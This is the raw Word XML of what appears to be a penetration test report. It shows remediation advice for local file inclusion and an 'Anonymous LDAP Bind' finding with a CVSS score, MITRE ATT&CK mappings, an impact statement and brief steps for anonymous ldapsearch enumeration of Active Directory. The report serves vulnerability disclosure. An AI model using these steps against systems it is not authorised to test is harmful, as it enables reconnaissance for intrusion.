        <w:t xml:space="preserve">whitelist cannot be used (such as arbitrary filenames), </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3BD6EBF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>store filenames in a database and use table row identifiers in user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="01B3BAC1" w14:textId="691D9AC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46A774E" w:rsidP="0D325B6E" w:rsidRDefault="246A774E" w14:paraId="4FDF728F" w14:textId="296FC0C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6A774E">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2720B7DE" w:rsidP="0D325B6E" w:rsidRDefault="2720B7DE" w14:paraId="1769B7AF" w14:textId="46A56CB5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rb8602dbd0dcc4d1c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2720B7DE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Testing for Local File Inclusion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="687DF0A9" w14:textId="4732E4DE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="605DD22D" w14:textId="1E0DBE69">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4317C853" w14:textId="31F891F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0705525C" w14:textId="6358E4B3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="051BFD11" w14:textId="738D998D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2513B61A" w14:textId="1675319C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3544C999" w14:textId="26B9DFDE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7FFE0A9B" w14:textId="4664D990">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2E906D68" w14:textId="55705DC7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="35472238" w14:textId="009C4DAA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3B436F59" w14:textId="57339C29">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="42743661" w14:textId="495BD5D7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="12BE3E80" w:rsidP="0D325B6E" w:rsidRDefault="12BE3E80" w14:paraId="36B0EFBF" w14:textId="296256D4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>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12BE3E80">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12BE3E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Anonymous LDAP Bind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75"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7EBD4F97">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A3A7AE" w14:textId="3CBBAEB4">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708361" w14:textId="35CA83C1">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4ABF28" w14:textId="64107917">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FABE6CC">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C98537" w14:textId="4DA0ABDB">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F293001" w14:textId="46FC3571">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines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AAC7BC9" w14:textId="4B2AF79E">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>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6.9</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F24C716" w14:textId="12C87E16">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines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35049EAD">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BD942EC" w14:textId="3D758815">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CD18DC1" w14:textId="4A56252C">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines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1C15D3E0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33E2073B"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7C7AEF68">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6780C47" w14:textId="4FE14FC3">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630ED7F" w14:textId="5895DAF0">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N" r:id="Rb7a01df253b84777">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0C31CAF0">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F2F6021" w14:textId="327CAD9E">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4F579B" w14:textId="43B692EB">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>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85D5891" w14:textId="54D90522">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ra1777b73c3ff4234">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>1482</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1EDC8F2E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="65408F7D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Domain Trust Discovery</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="37C8D43B" w14:textId="734B6CAC">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R6eef75549ce347ca">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1087.002</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="235C7FF0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Account Discovery</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5B7A9275">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> -</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Domain Account</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1819BA40">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6C93E5C8"/>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90EAD19" w14:textId="3F016994">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>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AEBA168" w14:textId="13B6435A">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R1dca0d9044dd4c29">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1047</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0940FBFC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Audit</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="13F09D21" w14:textId="4318C400">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3d9ebad7ceb645f2">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1030</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B5AE9A8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Network Segmentation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="586770F0">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988B633" w14:textId="4A43274C">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325B563" w14:textId="256C7BBC">
            <w:pPr>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:after="0" w:afterAutospacing="off"/>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00E8A0BB" w14:textId="44D5C535">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off"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479A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="393E7948" w14:textId="416FCC69">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off"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79A564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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="366BC597" w14:textId="445067DB">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The LDAP (Lightweight Directory Access Protocol) service allows anonymous binding which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permits</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unauthenticated users to connect to Active Directory and query sensitive information. LDAP stores user account details, group memberships, and computer information for the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2945CD2D" w14:textId="5614DA4E">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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="347C0900" w14:textId="35BA5DC9">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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="2E3C2629" w14:textId="70CDF3B8">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perform reconnaissance without any credentials, gathering information about the internal network, including usernames, group details, and network services. This can be used for further attacks such as password spraying, phishing, and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targe</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0DC83390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ted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exploitation of user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="30F2F73D" w14:textId="73E6D9AF">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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="2B3D2A91" w14:textId="41F37873">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79A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="3365F622" w14:textId="097F1393">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ldapsearch</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to connect to the LDAP server and bind to the server without providing a username or password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="479A5644" w:rsidP="0D325B6E" w:rsidRDefault="479A5644" w14:paraId="3EA20BB7" w14:textId="66AE051B">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Step 2: Perform a search query </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="479A5644">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to search for common objects and view the returned query.</w:t>
      </w:r>
    </w:p>
